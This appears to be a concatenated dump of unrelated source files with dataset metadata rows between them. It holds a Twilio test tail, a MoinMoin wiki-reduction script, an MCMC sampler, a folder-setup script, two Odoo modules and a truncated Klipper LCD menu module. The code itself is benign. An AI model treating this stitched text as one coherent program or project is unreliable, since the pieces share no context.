'https://conversations.twilio.com/v1/Roles',
))
def test_read_full_response(self):
self.holodeck.mock(Response(
200,
'''
{
"meta": {
"page": 0,
"page_size": 50,
"first_page_url": "https://conversations.twilio.com/v1/Roles?PageSize=50&Page=0",
"previous_page_url": null,
"url": "https://conversations.twilio.com/v1/Roles?PageSize=50&Page=0",
"next_page_url": null,
"key": "roles"
},
"roles": [
{
"sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"chat_service_sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Conversation Role",
"type": "conversation",
"permissions": [
"sendMessage",
"leaveConversation",
"editOwnMessage",
"deleteOwnMessage"
],
"date_created": "2016-03-03T19:47:15Z",
"date_updated": "2016-03-03T19:47:15Z",
"url": "https://conversations.twilio.com/v1/Roles/RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
]
}
'''
))
actual = self.client.conversations.v1.roles.list()
self.assertIsNotNone(actual)
def test_read_empty_response(self):
self.holodeck.mock(Response(
200,
'''
{
"meta": {
"page": 0,
"page_size": 50,
"first_page_url": "https://conversations.twilio.com/v1/Roles?PageSize=50&Page=0",
"previous_page_url": null,
"url": "https://conversations.twilio.com/v1/Roles?PageSize=50&Page=0",
"next_page_url": null,
"key": "roles"
},
"roles": []
}
'''
))
actual = self.client.conversations.v1.roles.list()
self.assertIsNotNone(actual)
| mit | -948,747,413,364,128,500 | 34.425532 | 137 | 0.525165 | false |
RealTimeWeb/wikisite | MoinMoin/script/maint/reducewiki.py | 1 | 3025 | # -*- coding: iso-8859-1 -*-
"""
MoinMoin - reducewiki script
@copyright: 2005-2006 MoinMoin:ThomasWaldmann
@license: GPL, see COPYING for details
"""
import os, shutil, codecs
from MoinMoin import config, wikiutil
from MoinMoin.Page import Page
from MoinMoin.action import AttachFile
from MoinMoin.script import MoinScript
class PluginScript(MoinScript):
"""\
Purpose:
========
This tool allows you to reduce a data/ directory to just the latest page
revision of each non-deleted page (plus all attachments).
This is used to make the distributed underlay directory, but can also be
used for other purposes.
So we change like this:
* data/pages/PageName/revisions/{1,2,3,4}
-> data/pages/revisions/1 (with content of 4)
* data/pages/PageName/current (pointing to e.g. 4)
-> same (pointing to 1)
* data/pages/PageName/edit-log and data/edit-log
-> do not copy
* data/pages/PageName/attachments/*
-> just copy
Detailed Instructions:
======================
General syntax: moin [options] maint reducewiki [reducewiki-options]
[options] usually should be:
--config-dir=/path/to/my/cfg/ --wiki-url=http://wiki.example.org/
[reducewiki-options] see below:
0. To create a wiki data/ directory with just the latest revisions in the
directory '/mywiki'
moin ... maint reducewiki --target-dir=/mywiki
"""
def __init__(self, argv, def_values):
MoinScript.__init__(self, argv, def_values)
self.parser.add_option(
"-t", "--target-dir", dest="target_dir",
help="Write reduced wiki data to DIRECTORY."
)
def copypage(self, request, rootdir, pagename):
""" quick and dirty! """
pagedir = os.path.join(rootdir, 'pages', wikiutil.quoteWikinameFS(pagename))
os.makedirs(pagedir)
# write a "current" file with content "00000001"
revstr = '%08d' % 1
cf = os.path.join(pagedir, 'current')
file(cf, 'w').write(revstr+'\n')
# create a single revision 00000001
revdir = os.path.join(pagedir, 'revisions')
os.makedirs(revdir)
tf = os.path.join(revdir, revstr)
p = Page(request, pagename)
text = p.get_raw_body().replace("\n", "\r\n")
codecs.open(tf, 'wb', config.charset).write(text)
source_dir = AttachFile.getAttachDir(request, pagename)
if os.path.exists(source_dir):
dest_dir = os.path.join(pagedir, "attachments")
os.makedirs(dest_dir)
for filename in os.listdir(source_dir):
source_file = os.path.join(source_dir, filename)
dest_file = os.path.join(dest_dir, filename)
shutil.copyfile(source_file, dest_file)
def mainloop(self):
self.init_request()
request = self.request
destdir = self.options.target_dir
pagelist = list(request.rootpage.getPageList(user=''))
for pagename in pagelist:
self.copypage(request, destdir, pagename)
| apache-2.0 | 1,400,899,292,419,346,000 | 32.241758 | 84 | 0.63438 | false |
adrn/streams | streams/rewinder/sampler.py | 2 | 2596 | # coding: utf-8
""" Special emcee sampler for Rewinder. """
from __future__ import division, print_function
__author__ = "adrn <[email protected]>"
# Standard library
import os
import sys
import time
# Third-party
from emcee import EnsembleSampler
import numpy as np
import h5py  # used by write() below; the TODO notes the intent to drop this dependency
from astropy import log as logger
__all__ = ['RewinderSampler']
# TODO: banish h5py
class RewinderSampler(EnsembleSampler):
def __init__(self, model, nwalkers=None, pool=None, a=2.):
""" """
if nwalkers is None:
nwalkers = model.nparameters*2 + 2
self.nwalkers = nwalkers
super(RewinderSampler, self).__init__(self.nwalkers, model.nparameters, model,
pool=pool, a=a)
def write(self, filename, ii=None):
if ii is None:
ii = self.chain.shape[1]
# write the sampler data to an HDF5 file
logger.info("Writing sampler data to '{}'...".format(filename))
with h5py.File(filename, "w") as f:
f["last_step"] = ii
f["chain"] = self.chain
f["lnprobability"] = self.lnprobability
f["acceptance_fraction"] = self.acceptance_fraction
try:
f["acor"] = self.acor
except:
logger.warn("Failed to compute autocorrelation time.")
f["acor"] = []
def run_inference(self, pos, nsteps, output_every=None,
output_file="emcee_snapshot.txt", first_step=0): # path=
""" Custom run MCMC that caches the sampler every specified number
of steps.
"""
if output_every is None:
output_every = nsteps
logger.info("Running {} walkers for {} steps..."
.format(self.nwalkers, nsteps))
time0 = time.time()
ii = first_step
for outer_loop in range(nsteps // output_every):
self.reset()
for results in self.sample(pos, iterations=output_every):
ii += 1
# TODO: need to append to file...
# self.write(os.path.join(path,output_file_fmt.format(ii)), ii=ii)
pos = results[0]
# the remainder
remainder = nsteps % output_every
if remainder > 0:
self.reset()
for results in self.sample(pos, iterations=remainder):
ii += 1
# TODO:
# self.write(os.path.join(path,output_file_fmt.format(ii)), ii=ii)
t = time.time() - time0
logger.debug("Spent {} seconds on main sampling...".format(t))
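# Illustrative usage sketch (commented out; assumes a `model` object that is
# callable as a log-probability and exposes `nparameters`, as this class expects):
# sampler = RewinderSampler(model, nwalkers=64)
# p0 = np.random.normal(size=(sampler.nwalkers, model.nparameters))
# sampler.run_inference(p0, nsteps=1000, output_every=100)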
| mit | -5,250,285,706,520,452,000 | 29.541176 | 86 | 0.555085 | false |
mmlacak/crochess | book/py/fs.py | 1 | 4102 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2017 - 2020 Mario Mlačak, [email protected]
# Licensed under 3-clause (modified) BSD license. See LICENSE for details.
import os
import os.path
SUBFOLDERS = [ \
'boards', \
\
'castlings', \
# 'castlings/01_oc', \
'castlings/02_c', \
# 'castlings/03_oct', \
'castlings/04_ct', \
# 'castlings/05_oma', \
'castlings/06_ma', \
# 'castlings/07_oaoa', \
'castlings/08_aoa', \
# 'castlings/09_omv', \
'castlings/10_mv', \
# 'castlings/11_on', \
'castlings/12_n', \
# 'castlings/13_ohd', \
'castlings/14_hd', \
# 'castlings/15_otr', \
'castlings/16_tr', \
# 'castlings/17_ocot', \
'castlings/18_cot', \
# 'castlings/19_od', \
'castlings/20_d', \
# 'castlings/21_oo', \
'castlings/22_o', \
\
'en_passants', \
\
'examples', \
# 'examples/01_oc', \
'examples/02_c', \
# 'examples/03_oct', \
'examples/04_ct', \
# 'examples/05_oma', \
'examples/06_ma', \
# 'examples/07_oaoa', \
'examples/08_aoa', \
# 'examples/09_omv', \
'examples/10_mv', \
# 'examples/11_on', \
'examples/12_n', \
# 'examples/13_ohd', \
'examples/14_hd', \
# 'examples/15_otr', \
'examples/16_tr', \
# 'examples/17_ocot', \
'examples/18_cot', \
# 'examples/19_od', \
'examples/20_d', \
# 'examples/21_oo', \
'examples/22_o', \
\
'pieces', \
'pieces/bishop', \
'pieces/star', \
\
'rush', \
\
'isa', \
# 'isa/01_oc', \
'isa/02_c', \
# 'isa/03_oct', \
'isa/04_ct', \
# 'isa/05_oma', \
'isa/06_ma', \
# 'isa/07_oaoa', \
'isa/08_aoa', \
# 'isa/09_omv', \
'isa/10_mv', \
# 'isa/11_on', \
'isa/12_n', \
# 'isa/13_ohd', \
'isa/14_hd', \
# 'isa/15_otr', \
'isa/16_tr', \
# 'isa/17_ocot', \
'isa/18_cot', \
# 'isa/19_od', \
'isa/20_d', \
# 'isa/21_oo', \
'isa/22_o', \
\
'test', \
]
def find_subfolder(path=None):
if path is None:
path = os.getcwd()
return os.path.abspath(path)
def mkdirs(folder_name):
path = os.path.normpath(os.path.abspath(folder_name))
if not os.path.isdir(path):
print(folder_name)
os.makedirs(path)
def create_subfolders(path=None):
print
old = os.getcwd()
print("Old:", old)
try:
root = find_subfolder(path=path)
print("Root:", root)
os.chdir(root)
print
print("Subfolders:")
for folder_name in SUBFOLDERS:
mkdirs(folder_name)
finally:
print("Restoring:", old)
os.chdir(old)
print
if __name__ == '__main__':
create_subfolders()
| bsd-3-clause | 4,197,805,374,679,246,000 | 30.546154 | 74 | 0.333333 | false |
gityopie/odoo-addons | website_google_address_form/controllers/main.py | 1 | 1416 | # -*- coding: utf-8 -*-
# License AGPL-3
from odoo import http
from odoo.http import request
from odoo.tools.safe_eval import safe_eval
class WebsiteGoogleAddressForm(http.Controller):
@http.route('/my/account/get_country', type='json', auth='public')
def get_country(self, country):
country_id = request.env['res.country'].sudo().search([
'|', ('code', '=', country), ('name', '=', country)])
return country_id and country_id.id or False
@http.route('/my/account/get_country_state', type='json', auth='public')
def get_country_state(self, country, state):
country_id = request.env['res.country'].sudo().search([
'|', ('code', '=', country), ('name', '=', country)])
state_id = request.env['res.country.state'].sudo().search([
'&', '|', ('code', '=', state), ('name', '=', state),
('country_id', '=', country_id.id)])
return state_id and state_id.id or False
@http.route('/gplaces/country_restrictions', type='json', auth='public')
def get_gmap_country_restriction(self):
countries = request.env['ir.config_parameter'].sudo().get_param(
'google.country_restriction', default='[]')
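        # the parameter holds a Python literal list (parsed with safe_eval);
        # the second element of each entry is taken as the country code below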
list_countries = safe_eval(countries)
if list_countries:
countries_code = [country[1] for country in list_countries]
return countries_code
return []
| lgpl-3.0 | -5,059,540,205,622,902,000 | 40.647059 | 76 | 0.59887 | false |
jeffery9/mixprint_addons | sale/wizard/sale_make_invoice_advance.py | 4 | 10409 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
class sale_advance_payment_inv(osv.osv_memory):
_name = "sale.advance.payment.inv"
_description = "Sales Advance Payment Invoice"
_columns = {
'advance_payment_method':fields.selection(
[('all', 'Invoice the whole sales order'), ('percentage','Percentage'), ('fixed','Fixed price (deposit)'),
('lines', 'Some order lines')],
'What do you want to invoice?', required=True,
help="""Use All to create the final invoice.
Use Percentage to invoice a percentage of the total amount.
Use Fixed Price to invoice a specific amound in advance.
Use Some Order Lines to invoice a selection of the sales order lines."""),
'qtty': fields.float('Quantity', digits=(16, 2), required=True),
'product_id': fields.many2one('product.product', 'Advance Product',
help="""Select a product of type service which is called 'Advance Product'.
You may have to create it and set it as a default value on this field."""),
'amount': fields.float('Advance Amount', digits_compute= dp.get_precision('Account'),
help="The amount to be invoiced in advance."),
}
def _get_advance_product(self, cr, uid, context=None):
try:
product = self.pool.get('ir.model.data').get_object(cr, uid, 'sale', 'advance_product_0')
except ValueError:
# a ValueError is returned if the xml id given is not found in the table ir_model_data
return False
return product.id
_defaults = {
'advance_payment_method': 'all',
'qtty': 1.0,
'product_id': _get_advance_product,
}
def onchange_method(self, cr, uid, ids, advance_payment_method, product_id, context=None):
if advance_payment_method == 'percentage':
return {'value': {'amount':0, 'product_id':False }}
if product_id:
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
return {'value': {'amount': product.list_price}}
return {'value': {'amount': 0}}
def _prepare_advance_invoice_vals(self, cr, uid, ids, context=None):
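        # Build one advance invoice (as a values dict) per selected sales order,
        # invoicing either a percentage of the order total or a fixed amount on
        # a single line that uses the configured advance product.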
if context is None:
context = {}
sale_obj = self.pool.get('sale.order')
ir_property_obj = self.pool.get('ir.property')
fiscal_obj = self.pool.get('account.fiscal.position')
inv_line_obj = self.pool.get('account.invoice.line')
wizard = self.browse(cr, uid, ids[0], context)
sale_ids = context.get('active_ids', [])
result = []
for sale in sale_obj.browse(cr, uid, sale_ids, context=context):
val = inv_line_obj.product_id_change(cr, uid, [], wizard.product_id.id,
uom_id=False, partner_id=sale.partner_id.id, fposition_id=sale.fiscal_position.id)
res = val['value']
# determine and check income account
if not wizard.product_id.id :
prop = ir_property_obj.get(cr, uid,
'property_account_income_categ', 'product.category', context=context)
prop_id = prop and prop.id or False
account_id = fiscal_obj.map_account(cr, uid, sale.fiscal_position.id or False, prop_id)
if not account_id:
raise osv.except_osv(_('Configuration Error!'),
_('There is no income account defined as global property.'))
res['account_id'] = account_id
if not res.get('account_id'):
raise osv.except_osv(_('Configuration Error!'),
_('There is no income account defined for this product: "%s" (id:%d).') % \
(wizard.product_id.name, wizard.product_id.id,))
# determine invoice amount
if wizard.amount <= 0.00:
raise osv.except_osv(_('Incorrect Data'),
_('The value of Advance Amount must be positive.'))
if wizard.advance_payment_method == 'percentage':
inv_amount = sale.amount_total * wizard.amount / 100
if not res.get('name'):
res['name'] = _("Advance of %s %%") % (wizard.amount)
else:
inv_amount = wizard.amount
if not res.get('name'):
#TODO: should find a way to call formatLang() from rml_parse
symbol = sale.pricelist_id.currency_id.symbol
if sale.pricelist_id.currency_id.position == 'after':
res['name'] = _("Advance of %s %s") % (inv_amount, symbol)
else:
res['name'] = _("Advance of %s %s") % (symbol, inv_amount)
# determine taxes
if res.get('invoice_line_tax_id'):
res['invoice_line_tax_id'] = [(6, 0, res.get('invoice_line_tax_id'))]
else:
res['invoice_line_tax_id'] = False
# create the invoice
inv_line_values = {
'name': res.get('name'),
'origin': sale.name,
'account_id': res['account_id'],
'price_unit': inv_amount,
'quantity': wizard.qtty or 1.0,
'discount': False,
'uos_id': res.get('uos_id', False),
'product_id': wizard.product_id.id,
'invoice_line_tax_id': res.get('invoice_line_tax_id'),
'account_analytic_id': sale.project_id.id or False,
}
inv_values = {
'name': sale.client_order_ref or sale.name,
'origin': sale.name,
'type': 'out_invoice',
'reference': False,
'account_id': sale.partner_id.property_account_receivable.id,
'partner_id': sale.partner_invoice_id.id,
'invoice_line': [(0, 0, inv_line_values)],
'currency_id': sale.pricelist_id.currency_id.id,
'comment': '',
'payment_term': sale.payment_term.id,
'fiscal_position': sale.fiscal_position.id or sale.partner_id.property_account_position.id
}
result.append((sale.id, inv_values))
return result
def _create_invoices(self, cr, uid, inv_values, sale_id, context=None):
inv_obj = self.pool.get('account.invoice')
sale_obj = self.pool.get('sale.order')
inv_id = inv_obj.create(cr, uid, inv_values, context=context)
inv_obj.button_reset_taxes(cr, uid, [inv_id], context=context)
# add the invoice to the sales order's invoices
sale_obj.write(cr, uid, sale_id, {'invoice_ids': [(4, inv_id)]}, context=context)
return inv_id
def create_invoices(self, cr, uid, ids, context=None):
""" create invoices for the active sales orders """
sale_obj = self.pool.get('sale.order')
act_window = self.pool.get('ir.actions.act_window')
wizard = self.browse(cr, uid, ids[0], context)
sale_ids = context.get('active_ids', [])
if wizard.advance_payment_method == 'all':
# create the final invoices of the active sales orders
res = sale_obj.manual_invoice(cr, uid, sale_ids, context)
if context.get('open_invoices', False):
return res
return {'type': 'ir.actions.act_window_close'}
if wizard.advance_payment_method == 'lines':
# open the list view of sales order lines to invoice
res = act_window.for_xml_id(cr, uid, 'sale', 'action_order_line_tree2', context)
res['context'] = {
'search_default_uninvoiced': 1,
'search_default_order_id': sale_ids and sale_ids[0] or False,
}
return res
assert wizard.advance_payment_method in ('fixed', 'percentage')
inv_ids = []
for sale_id, inv_values in self._prepare_advance_invoice_vals(cr, uid, ids, context=context):
inv_ids.append(self._create_invoices(cr, uid, inv_values, sale_id, context=context))
if context.get('open_invoices', False):
return self.open_invoices( cr, uid, ids, inv_ids, context=context)
return {'type': 'ir.actions.act_window_close'}
def open_invoices(self, cr, uid, ids, invoice_ids, context=None):
""" open a view on one of the given invoice_ids """
ir_model_data = self.pool.get('ir.model.data')
form_res = ir_model_data.get_object_reference(cr, uid, 'account', 'invoice_form')
form_id = form_res and form_res[1] or False
tree_res = ir_model_data.get_object_reference(cr, uid, 'account', 'invoice_tree')
tree_id = tree_res and tree_res[1] or False
return {
'name': _('Advance Invoice'),
'view_type': 'form',
'view_mode': 'form,tree',
'res_model': 'account.invoice',
'res_id': invoice_ids[0],
'view_id': False,
'views': [(form_id, 'form'), (tree_id, 'tree')],
'context': "{'type': 'out_invoice'}",
'type': 'ir.actions.act_window',
}
sale_advance_payment_inv()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 9,213,265,935,563,653,000 | 47.413953 | 118 | 0.561245 | false |
KevinOConnor/klipper | klippy/extras/display/menu.py | 1 | 36379 | # -*- coding: utf-8 -*-
# Basic LCD menu support
#
# Copyright (C) 2020 Janar Sööt <[email protected]>
#
# This file may be distributed under the terms of the GNU GPLv3 license.
import os, logging, ast, re
from string import Template
from . import menu_keys
class sentinel:
pass
class error(Exception):
pass
# Scriptable menu element abstract baseclass
class MenuElement(object):
def __init__(self, manager, config, **kwargs):
if type(self) is MenuElement:
raise error(
'Abstract MenuElement cannot be instantiated directly')
self._manager = manager
self._cursor = '>'
# set class defaults and attributes from arguments
self._index = kwargs.get('index', None)
self._enable = kwargs.get('enable', True)
self._name = kwargs.get('name', None)
self._enable_tpl = self._name_tpl = None
if config is not None:
# overwrite class attributes from config
self._index = config.getint('index', self._index)
self._name_tpl = manager.gcode_macro.load_template(
config, 'name', self._name)
try:
self._enable = config.getboolean('enable', self._enable)
except config.error:
self._enable_tpl = manager.gcode_macro.load_template(
config, 'enable')
# item namespace - used in relative paths
self._ns = str(" ".join(config.get_name().split(' ')[1:])).strip()
else:
# ns - item namespace key, used in item relative paths
# $__id - generated id text variable
__id = '__menu_' + hex(id(self)).lstrip("0x").rstrip("L")
self._ns = Template(
'menu ' + kwargs.get('ns', __id)).safe_substitute(__id=__id)
self._last_heartbeat = None
self.__scroll_pos = None
self.__scroll_request_pending = False
self.__scroll_next = 0
# menu scripts
self._scripts = {}
# init
self.init()
# override
def init(self):
pass
def _render_name(self):
if self._name_tpl is not None:
context = self.get_context()
return self.manager.asflat(self._name_tpl.render(context))
return self.manager.asflat(self._name)
def _load_script(self, config, name, option=None):
"""Load script template from config or callback from dict"""
if name in self._scripts:
logging.info(
"Declaration of '%s' hides "
"previous script declaration" % (name,))
option = option or name
if isinstance(config, dict):
self._scripts[name] = config.get(option, None)
else:
self._scripts[name] = self.manager.gcode_macro.load_template(
config, option, '')
# override
def is_editing(self):
return False
# override
def is_scrollable(self):
return True
# override
def is_enabled(self):
context = self.get_context()
return self.eval_enable(context)
# override
def start_editing(self):
pass
# override
def stop_editing(self):
pass
# override
def get_context(self, cxt=None):
# get default menu context
context = self.manager.get_context(cxt)
context['menu'].update({
'ns': self.get_ns()
})
return context
def eval_enable(self, context):
if self._enable_tpl is not None:
return bool(ast.literal_eval(self._enable_tpl.render(context)))
return bool(self._enable)
# Called when a item is selected
def select(self):
self.__reset_scroller()
def heartbeat(self, eventtime):
self._last_heartbeat = eventtime
if eventtime >= self.__scroll_next:
self.__scroll_next = eventtime + 0.5
if not self.is_editing():
self.__update_scroller()
def __update_scroller(self):
if self.__scroll_pos is None and self.__scroll_request_pending is True:
self.__scroll_pos = 0
elif self.__scroll_request_pending is True:
self.__scroll_pos += 1
self.__scroll_request_pending = False
elif self.__scroll_request_pending is False:
pass # hold scroll position
elif self.__scroll_request_pending is None:
self.__reset_scroller()
def __reset_scroller(self):
self.__scroll_pos = None
self.__scroll_request_pending = False
def need_scroller(self, value):
"""
Allows to control the scroller
Parameters:
value (bool, None): True - inc. scroll pos. on next update
False - hold scroll pos.
None - reset the scroller
"""
self.__scroll_request_pending = value
def __slice_name(self, name, index):
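        # Split the rendered name into single characters plus atomic ~glyph~
        # placeholders so that horizontal scrolling never cuts a glyph in half.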
chunks = []
for i, text in enumerate(re.split(r'(\~.*?\~)', name)):
if i & 1 == 0: # text
chunks += text
else: # glyph placeholder
chunks.append(text)
return "".join(chunks[index:])
def render_name(self, selected=False):
name = str(self._render_name())
if selected and self.__scroll_pos is not None:
name = self.__slice_name(name, self.__scroll_pos)
else:
self.__reset_scroller()
return name
def get_ns(self, name='.'):
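        # Resolve an item name relative to this element's namespace, e.g. with
        # self._ns == "menu main settings":
        #   ".fan"  -> "menu main settings fan"
        #   "..fan" -> "menu main fan"  (one namespace level up)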
name = str(name).strip()
if name.startswith('..'):
name = ' '.join(
[(' '.join(str(self._ns).split(' ')[:-1])), name[2:]])
elif name.startswith('.'):
name = ' '.join([str(self._ns), name[1:]])
return name.strip()
def send_event(self, event, *args):
return self.manager.send_event(
"%s:%s" % (self.get_ns(), str(event)), *args)
def get_script(self, name):
if name in self._scripts:
return self._scripts[name]
return None
def _run_script(self, name, context):
_render = getattr(self._scripts[name], 'render', None)
# check template
if _render is not None and callable(_render):
return _render(context)
# check callback
elif callable(self._scripts[name]):
return self._scripts[name](self, context)
# check static string
elif isinstance(self._scripts[name], str):
return self._scripts[name]
def run_script(self, name, **kwargs):
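        # Render the named script (template, callback or static string), queue
        # the result as g-code unless render_only is set, then invoke the
        # element's handle_script_<name> method if one is defined.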
event = kwargs.get('event', None)
context = kwargs.get('context', None)
render_only = kwargs.get('render_only', False)
result = ""
# init context
if name in self._scripts:
context = self.get_context(context)
context['menu'].update({
'event': event or name
})
result = self._run_script(name, context)
if not render_only:
# run result as gcode
self.manager.queue_gcode(result)
# default behaviour
_handle = getattr(self, "handle_script_" + name, None)
if callable(_handle):
_handle()
return result
@property
def cursor(self):
return str(self._cursor)[:1]
@property
def manager(self):
return self._manager
@property
def index(self):
return self._index
class MenuContainer(MenuElement):
"""Menu container abstract class"""
def __init__(self, manager, config, **kwargs):
if type(self) is MenuContainer:
raise error(
'Abstract MenuContainer cannot be instantiated directly')
super(MenuContainer, self).__init__(manager, config, **kwargs)
self._populate_cb = kwargs.get('populate', None)
self._cursor = '>'
self.__selected = None
self._allitems = []
self._names = []
self._items = []
def init(self):
super(MenuContainer, self).init()
# recursive guard
self._parents = []
# overload
def _names_aslist(self):
return []
# overload
def is_accepted(self, item):
return isinstance(item, MenuElement)
def is_editing(self):
return any([item.is_editing() for item in self._items])
def stop_editing(self):
for item in self._items:
if item.is_editing():
item.stop_editing()
def lookup_item(self, item):
if isinstance(item, str):
name = item.strip()
ns = self.get_ns(name)
return (self.manager.lookup_menuitem(ns), name)
elif isinstance(item, MenuElement):
return (item, item.get_ns())
return (None, item)
# overload
def _lookup_item(self, item):
return self.lookup_item(item)
def _index_of(self, item):
try:
index = None
if isinstance(item, str):
s = item.strip()
index = self._names.index(s)
elif isinstance(item, MenuElement):
index = self._items.index(item)
return index
except ValueError:
return None
def index_of(self, item, look_inside=False):
index = self._index_of(item)
if index is None and look_inside is True:
for con in self:
if isinstance(con, MenuContainer) and con._index_of(item):
index = self._index_of(con)
return index
def add_parents(self, parents):
if isinstance(parents, list):
self._parents.extend(parents)
else:
self._parents.append(parents)
def assert_recursive_relation(self, parents=None):
assert self not in (parents or self._parents), \
"Recursive relation of '%s' container" % (self.get_ns(),)
def insert_item(self, s, index=None):
self._insert_item(s, index)
def _insert_item(self, s, index=None):
item, name = self._lookup_item(s)
if item is not None:
if not self.is_accepted(item):
                raise error("Menu item '%s' is not accepted!" % str(type(item)))
if isinstance(item, (MenuElement)):
item.init()
if isinstance(item, (MenuContainer)):
item.add_parents(self._parents)
item.add_parents(self)
item.assert_recursive_relation()
if index is None:
self._allitems.append((item, name))
else:
self._allitems.insert(index, (item, name))
# overload
def _populate(self):
pass
def populate(self):
self._allitems = [] # empty list
for name in self._names_aslist():
self._insert_item(name)
# populate successor items
self._populate()
# run populate callback
if self._populate_cb is not None and callable(self._populate_cb):
self._populate_cb(self)
# send populate event
self.send_event('populate', self)
def update_items(self):
_a = [(item, name) for item, name in self._allitems
if item.is_enabled()]
self._items, self._names = zip(*_a) or ([], [])
# select methods
def init_selection(self):
self.select_at(0)
def select_at(self, index):
self.__selected = index
# select element
item = self.selected_item()
if isinstance(item, MenuElement):
item.select()
return item
def select_item(self, needle):
if isinstance(needle, MenuElement):
if self.selected_item() is not needle:
index = self.index_of(needle)
if index is not None:
self.select_at(index)
else:
logging.error("Cannot select non menuitem")
return self.selected
def selected_item(self):
if isinstance(self.selected, int) and 0 <= self.selected < len(self):
return self[self.selected]
else:
return None
def select_next(self):
if not isinstance(self.selected, int):
index = 0 if len(self) else None
elif 0 <= self.selected < len(self) - 1:
index = self.selected + 1
else:
index = self.selected
return self.select_at(index)
def select_prev(self):
if not isinstance(self.selected, int):
index = 0 if len(self) else None
elif 0 < self.selected < len(self):
index = self.selected - 1
else:
index = self.selected
return self.select_at(index)
# override
def draw_container(self, nrows, eventtime):
pass
def __iter__(self):
return iter(self._items)
def __len__(self):
return len(self._items)
def __getitem__(self, key):
return self._items[key]
@property
def selected(self):
return self.__selected
class MenuDisabled(MenuElement):
def __init__(self, manager, config, **kwargs):
super(MenuDisabled, self).__init__(manager, config, name='')
def is_enabled(self):
return False
class MenuCommand(MenuElement):
def __init__(self, manager, config, **kwargs):
super(MenuCommand, self).__init__(manager, config, **kwargs)
self._load_script(config or kwargs, 'gcode')
class MenuInput(MenuCommand):
def __init__(self, manager, config, **kwargs):
super(MenuInput, self).__init__(manager, config, **kwargs)
# set class defaults and attributes from arguments
self._input = kwargs.get('input', None)
self._input_min = kwargs.get('input_min', -999999.0)
self._input_max = kwargs.get('input_max', 999999.0)
self._input_step = kwargs.get('input_step', 1.0)
self._realtime = kwargs.get('realtime', False)
self._input_tpl = self._input_min_tpl = self._input_max_tpl = None
if config is not None:
# overwrite class attributes from config
self._realtime = config.getboolean('realtime', self._realtime)
self._input_tpl = manager.gcode_macro.load_template(
config, 'input')
self._input_min_tpl = manager.gcode_macro.load_template(
config, 'input_min', str(self._input_min))
self._input_max_tpl = manager.gcode_macro.load_template(
config, 'input_max', str(self._input_max))
self._input_step = config.getfloat(
'input_step', self._input_step, above=0.)
def init(self):
super(MenuInput, self).init()
self._is_dirty = False
self.__last_change = None
self._input_value = None
def is_scrollable(self):
return False
def is_editing(self):
return self._input_value is not None
def stop_editing(self):
if not self.is_editing():
return
self._reset_value()
def start_editing(self):
if self.is_editing():
return
self._init_value()
def heartbeat(self, eventtime):
super(MenuInput, self).heartbeat(eventtime)
if (self._is_dirty is True
and self.__last_change is not None
and self._input_value is not None
and (eventtime - self.__last_change) > 0.250):
if self._realtime is True:
self.run_script('gcode', event='change')
self.run_script('change')
self._is_dirty = False
def get_context(self, cxt=None):
context = super(MenuInput, self).get_context(cxt)
value = (self._eval_value(context) if self._input_value is None
else self._input_value)
context['menu'].update({
'input': value
})
return context
def is_enabled(self):
context = super(MenuInput, self).get_context()
return self.eval_enable(context)
def _eval_min(self, context):
try:
if self._input_min_tpl is not None:
return float(ast.literal_eval(
self._input_min_tpl.render(context)))
return float(self._input_min)
except ValueError:
logging.exception("Input min value evaluation error")
def _eval_max(self, context):
try:
if self._input_max_tpl is not None:
return float(ast.literal_eval(
self._input_max_tpl.render(context)))
return float(self._input_max)
except ValueError:
logging.exception("Input max value evaluation error")
def _eval_value(self, context):
try:
if self._input_tpl is not None:
return float(ast.literal_eval(
self._input_tpl.render(context)))
return float(self._input)
except ValueError:
logging.exception("Input value evaluation error")
def _value_changed(self):
self.__last_change = self._last_heartbeat
self._is_dirty = True
def _init_value(self):
context = super(MenuInput, self).get_context()
self._input_value = None
self._input_min = self._eval_min(context)
self._input_max = self._eval_max(context)
self._input_value = min(self._input_max, max(
self._input_min, self._eval_value(context)))
self._value_changed()
def _reset_value(self):
self._input_value = None
def _get_input_step(self, fast_rate=False):
return ((10.0 * self._input_step) if fast_rate and (
(self._input_max - self._input_min) / self._input_step > 100.0)
else self._input_step)
def inc_value(self, fast_rate=False):
last_value = self._input_value
if self._input_value is None:
return
input_step = self._get_input_step(fast_rate)
self._input_value += abs(input_step)
self._input_value = min(self._input_max, max(
self._input_min, self._input_value))
if last_value != self._input_value:
self._value_changed()
def dec_value(self, fast_rate=False):
last_value = self._input_value
if self._input_value is None:
return
input_step = self._get_input_step(fast_rate)
self._input_value -= abs(input_step)
self._input_value = min(self._input_max, max(
self._input_min, self._input_value))
if last_value != self._input_value:
self._value_changed()
# default behaviour on click
def handle_script_click(self):
if not self.is_editing():
self.start_editing()
elif self.is_editing():
self.stop_editing()
class MenuList(MenuContainer):
def __init__(self, manager, config, **kwargs):
super(MenuList, self).__init__(manager, config, **kwargs)
self._viewport_top = 0
def _cb(el, context):
el.manager.back()
# create back item
self._itemBack = self.manager.menuitem_from(
'command', name='..', gcode=_cb)
def _names_aslist(self):
return self.manager.lookup_children(self.get_ns())
def _populate(self):
super(MenuList, self)._populate()
self._viewport_top = 0
# add back as first item
self.insert_item(self._itemBack, 0)
def draw_container(self, nrows, eventtime):
display = self.manager.display
selected_row = self.selected
# adjust viewport
if selected_row is not None:
if selected_row >= (self._viewport_top + nrows):
self._viewport_top = (selected_row - nrows) + 1
